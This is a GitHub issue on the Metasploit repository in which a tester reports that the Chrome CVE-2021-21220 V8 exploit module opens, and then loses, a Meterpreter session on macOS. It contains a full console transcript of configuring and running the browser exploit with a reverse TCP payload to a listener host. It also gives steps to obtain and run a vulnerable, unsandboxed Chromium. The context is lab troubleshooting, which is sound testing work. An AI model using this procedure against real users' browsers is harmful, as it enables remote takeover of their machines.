search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
34.3k stars 14.01k forks source link

Chrome OSX (cve_2021_21220_v8_insufficient_validation) #19512

Closed RootUp closed 1 month ago

RootUp commented 2 months ago

I am not sure if I am doing something wrong here but I am encountering the below error when, I am testing for "cve_2021_21220_v8_insufficient_validation" against macOS with a vulnerable browser, the session dies after sometime where the browser keeps loading the exploit URL. Although, this exploit works perfect on Windows but I got some issue for macOS.

System version: macOS 14.6.1 (23G93) Chromium: Version 90.0.4430.0 (Developer Build) (x86_64)

Configuration: (MSF is running on Kali VM and network is on NAT, base is macOS which has Chrome running.)

msf6 > search cve_2021_21220

Matching Modules
================

   #  Name                                                                    Disclosure Date  Rank    Check  Description
   -  ----                                                                    ---------------  ----    -----  -----------
   0  exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation  2021-04-13       manual  No     Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE

Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation

msf6 > use 0
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > set TArGET 2
TArGET => 2
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > show payloads

Compatible Payloads
===================

   #   Name                                           Disclosure Date  Rank    Check  Description
   -   ----                                           ---------------  ----    -----  -----------
   0   payload/generic/custom                                          normal  No     Custom Payload
   1   payload/generic/shell_bind_aws_ssm                              normal  No     Command Shell, Bind SSM (via AWS API)
   2   payload/generic/shell_bind_tcp                                  normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                               normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/ssh/interact                                    normal  No     Interact with Established SSH Connection
   5   payload/osx/x64/dupandexecve/bind_tcp                           normal  No     OS X dup2 Command Shell, Bind TCP Stager
   6   payload/osx/x64/dupandexecve/reverse_tcp                        normal  No     OS X dup2 Command Shell, Reverse TCP Stager
   7   payload/osx/x64/dupandexecve/reverse_tcp_uuid                   normal  No     OS X dup2 Command Shell, Reverse TCP Stager with UUID Support (OSX x64)
   8   payload/osx/x64/exec                                            normal  No     OS X x64 Execute Command
   9   payload/osx/x64/meterpreter/bind_tcp                            normal  No     OSX Meterpreter, Bind TCP Stager
   10  payload/osx/x64/meterpreter/reverse_tcp                         normal  No     OSX Meterpreter, Reverse TCP Stager
   11  payload/osx/x64/meterpreter/reverse_tcp_uuid                    normal  No     OSX Meterpreter, Reverse TCP Stager with UUID Support (OSX x64)
   12  payload/osx/x64/say                                             normal  No     OS X x64 say Shellcode
   13  payload/osx/x64/shell_bind_tcp                                  normal  No     OS X x64 Shell Bind TCP
   14  payload/osx/x64/shell_reverse_tcp                               normal  No     OS X x64 Shell Reverse TCP

msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > set PAYLOAD 11
PAYLOAD => osx/x64/meterpreter/reverse_tcp_uuid
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > set LHOST 172.16.30.21
LHOST => 172.16.30.21
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > set URIPATH /doodoo
URIPATH => /doodoo
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > options 

Module options (exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /doodoo          no        The URI to use for this exploit (default is random)

Payload options (osx/x64/meterpreter/reverse_tcp_uuid):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.30.21     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   2   macOS - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)

View the full module info with the info, or info -d command.

msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.30.21:4444 
[*] Using URL: http://172.16.30.21:8080/doodoo
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > [*] Server started.

msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > 
[*] 172.16.30.1      chrome_cve_2021_21220_v8_insufficient_validation - Sending /doodoo to Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.0 Safari/537.36
[*] Transmitting first stager...(214 bytes)
[*] Transmitting second stager...(49152 bytes)
[*] Sending stage (810648 bytes) to 172.16.30.1

msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
[-] The "sysinfo" command requires the "stdapi" extension to be loaded (run: `load stdapi`)
meterpreter > load stdapi
[-] The "load" command is not supported by this Meterpreter type (x64/osx)
meterpreter > 
[-] Meterpreter session 1 is not valid and will be closed

[*] 172.16.30.1 - Meterpreter session 1 closed.

msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > version 
Framework: 6.3.27-dev
Console  : 6.3.27-dev
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) >

Running Chrome: 

bash-3.2$ /Users/zero/Downloads/chrome-mac/Chromium.app/Contents/MacOS/Chromium --no-sandbox

Downloading Vuln Chromium:

Navigate to, https://vikyd.github.io/download-chromium-history-version/#/ select Mac and put in the version i.e., 90.0.4430.00 it should make a redirect to Chromium.

github-actions[bot] commented 1 month ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.